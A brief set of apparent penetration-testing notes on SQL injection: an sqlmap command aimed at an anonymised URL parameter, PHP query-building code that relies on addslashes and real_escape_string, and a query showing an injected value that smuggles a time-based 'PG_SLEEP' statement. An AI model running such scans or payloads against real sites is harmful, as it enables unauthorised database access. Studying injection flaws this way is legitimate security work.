python sqlmap.py --flush-session -u "http://xxx.xxx.com/xxx/xxx?areaid=1" --dbms MySQL
$v = addslashes($v); $cond .= "{$field} = '{$v}' ";
if (is_null($value)) { $exprs[] = "`{$field}`= NULL"; } else { $value = $this->conn->escapeString($value); // 这里是real_escape_string $exprs[] = "`{$field}`='{$value}'"; }
select areaid,name,lvl from admindb.tar_area where parent='1\';SELECT PG_SLEEP(5)--';